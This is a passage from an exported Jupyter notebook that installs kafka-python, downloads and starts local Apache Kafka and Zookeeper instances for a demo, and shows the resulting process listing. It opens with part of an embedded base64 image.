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) ###Code !pip install kafka-python ###Output Collecting kafka-python [?25l Downloading https://files.pythonhosted.org/packages/75/68/dcb0db055309f680ab2931a3eeb22d865604b638acf8c914bedf4c1a0c8c/kafka_python-2.0.2-py2.py3-none-any.whl (246kB)  |█▎ | 10kB 12.5MB/s eta 0:00:01  |██▋ | 20kB 18.6MB/s eta 0:00:01  |████ | 30kB 20.3MB/s eta 0:00:01  |█████▎ | 40kB 16.8MB/s eta 0:00:01  |██████▋ | 51kB 9.2MB/s eta 0:00:01  |████████ | 61kB 10.6MB/s eta 0:00:01  |█████████▎ | 71kB 8.7MB/s eta 0:00:01  |██████████▋ | 81kB 9.3MB/s eta 0:00:01  |████████████ | 92kB 10.2MB/s eta 0:00:01  |█████████████▎ | 102kB 7.0MB/s eta 0:00:01  |██████████████▋ | 112kB 7.0MB/s eta 0:00:01  |████████████████ | 122kB 7.0MB/s eta 0:00:01  |█████████████████▎ | 133kB 7.0MB/s eta 0:00:01  |██████████████████▋ | 143kB 7.0MB/s eta 0:00:01  |████████████████████ | 153kB 7.0MB/s eta 0:00:01  |█████████████████████▎ | 163kB 7.0MB/s eta 0:00:01  |██████████████████████▋ | 174kB 7.0MB/s eta 0:00:01  |████████████████████████ | 184kB 7.0MB/s eta 0:00:01  |█████████████████████████▎ | 194kB 7.0MB/s eta 0:00:01  |██████████████████████████▋ | 204kB 7.0MB/s eta 0:00:01  |████████████████████████████ | 215kB 7.0MB/s eta 0:00:01  |█████████████████████████████▎ | 225kB 7.0MB/s eta 0:00:01  |██████████████████████████████▋ | 235kB 7.0MB/s eta 0:00:01  |████████████████████████████████| 245kB 7.0MB/s eta 0:00:01  |████████████████████████████████| 256kB 7.0MB/s [?25hInstalling collected packages: kafka-python Successfully installed kafka-python-2.0.2 ###Markdown Import packages ###Code import os from datetime import datetime import time import threading import json from kafka import KafkaProducer from kafka.errors import KafkaError import pandas as pd from sklearn.model_selection import train_test_split ###Output _____no_output_____ ###Markdown Download and setup Kafka and Zookeeper instancesFor demo purposes, the following instances are setup locally:- Kafka (Brokers: 127.0.0.1:9092)- Zookeeper (Node: 127.0.0.1:2181) ###Code !curl -sSOL https://downloads.apache.org/kafka/2.7.0/kafka_2.13-2.7.0.tgz !tar -xzf kafka_2.13-2.7.0.tgz ###Output _____no_output_____ ###Markdown Using the default configurations (provided by Apache Kafka) for spinning up the instances. ###Code !./kafka_2.13-2.7.0/bin/zookeeper-server-start.sh -daemon ./kafka_2.13-2.7.0/config/zookeeper.properties !./kafka_2.13-2.7.0/bin/kafka-server-start.sh -daemon ./kafka_2.13-2.7.0/config/server.properties !echo "Waiting for 10 secs until kafka and zookeeper services are up and running" !sleep 10 ###Output Waiting for 10 secs until kafka and zookeeper services are up and running ###Markdown Once the instances are started as daemon processes, grep for `kafka` in the processes list. The two java processes correspond to zookeeper and the kafka instances. ###Code !ps -ef | grep kafka ###Output root 406 359 5 04:12 ? 00:00:16 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -cp /content/spark-3.1.2-bin-hadoop3.2/conf/:/content/spark-3.1.2-bin-hadoop3.2/jars/* -Xmx1g org.apache.spark.deploy.SparkSubmit --conf spark.jars.packages=org.apache.spark:spark-sql-kafka-0-10_2.11:2.4.5 pyspark-shell root 901 1 11 04:17 ? 00:00:01 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -Xmx512M -Xms512M -server -XX:+UseG1GC -XX:MaxGCPauseMillis=20 -XX:InitiatingHeapOccupancyPercent=35 -XX:+ExplicitGCInvokesConcurrent -XX:MaxInlineLevel=15 -Djava.awt.headless=true -Xloggc:/content/kafka_2.13-2.7.0/bin/../logs/zookeeper-gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dkafka.logs.dir=/content/kafka_2.13-2.7.0/bin/../logs -Dlog4j.configuration=file:./kafka_2.13-2.7.0/bin/../config/log4j.properties -cp /content/kafka_2.13-2.7.0/bin/../libs/activation-1.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/aopalliance-repackaged-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/argparse4j-0.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/audience-annotations-0.5.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-cli-1.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-lang3-3.8.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-api-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-basic-auth-extension-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-file-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-json-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-client-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-runtime-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-transforms-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-api-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-locator-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-utils-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-core-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-databind-2.10.5.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-dataformat-csv-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-datatype-jdk8-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-base-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-json-provider-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-jaxb-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-paranamer-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-scala_2.13-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.activation-api-1.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.annotation-api-1.3.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.inject-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.validation-api-2.0.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.ws.rs-api-2.1.6.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.xml.bind-api-2.3.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.25.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.26.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.servlet-api-3.1.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.ws.rs-api-2.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jaxb-api-2.3.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-client-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-common-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-core-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-hk2-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-media-jaxb-2.31.jar:/content/ka